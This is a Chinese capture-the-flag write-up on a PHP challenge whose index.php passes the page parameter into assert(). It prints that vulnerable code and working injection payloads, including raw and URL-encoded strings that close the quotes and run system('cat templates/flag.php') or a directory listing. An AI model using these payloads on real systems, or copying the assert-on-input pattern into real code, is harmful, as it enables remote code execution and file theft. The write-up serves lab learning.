进入题目,
emmm,scratch
F12,看到提示
about里有git,并且有git仓库,可以githack dump下来,打开index.php
<?php if (isset($_GET['page'])) { $page = $_GET['page']; } else { $page = "home"; } $file = "templates/" . $page . ".php"; // I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!"); // TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!"); ?>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>My PHP Website</title>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/css/bootstrap.min.css" />
</head>
<body>
<nav class="navbar navbar-inverse navbar-fixed-top">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="#">Project name</a>
</div>
<div id="navbar" class="collapse navbar-collapse">
<ul class="nav navbar-nav">
<li <?php if ($page == "home") { ?>class="active"<?php } ?>><a href="?page=home">Home</a></li>
<li <?php if ($page == "about") { ?>class="active"<?php } ?>><a href="?page=about">About</a></li>
<li <?php if ($page == "contact") { ?>class="active"<?php } ?>><a href="?page=contact">Contact</a></li>
<!--<li <?php if ($page == "flag") { ?>class="active"<?php } ?>><a href="?page=flag">My secrets</a></li> -->
</ul>
</div>
</div>
</nav>
<div class="container" style="margin-top: 50px">
<?php require_once $file; ?>
</div>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/1.12.4/jquery.min.js" />
<script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/js/bootstrap.min.js" />
</body>
</html>
看到assert我就知道了,看来是我没接触到的知识点,虽然知道assert,但是这道题不知道该怎么下手,查看了WP后,发现因为page获取到的参数没人任何过滤
$file = "templates/" . $page . ".php";
因为后面是assert,所以可以可以传入system函数,通过闭合来执行system
assert是把其参数当做php语句进行执行,既然file和我们的输入有关,而且又在strops函数之中,来个闭合绕过:
构造 about.php', '123') === false and system('cat templates/flag.php') and strpos('templates/flag,这样就可以看到flag.php的内容了,urlencode之后传参:
/?page=about.php%27%2c+%27123%27)+%3d%3d%3d+false+and+system(%27cat+templates%2fflag.php%27)+and+strpos(%27templates%2fflag
---------------------
作者:Flower__World
来源:CSDN
原文:https://blog.csdn.net/zz_Caleb/article/details/89318443
版权声明:本文为博主原创文章,转载请附上博文链接!
这里的知识点就是双引号内的变量可以替换,并且assert的全部字符参数可以作为php代码执行,所以执行了system('cat templates/flag.php')
但是看攻防世界里的wp中,传的payload为'.system("cd ../../../; ls -lA;").' 时,就可以列出东西,呢么直接page=%27.system(%27cat%20templates/flag.php%27).%27 然后右键源代码就可以看到flag了。
assert弄了一晚上没搞懂,反正自己试试了.在assert中的作用(发现像是连接函数一样,每个都能够执行),
发现可以执行system('dir'),我想知道assert的具体怎么实现这样的,有知道为什么会这样的老哥,告诉我下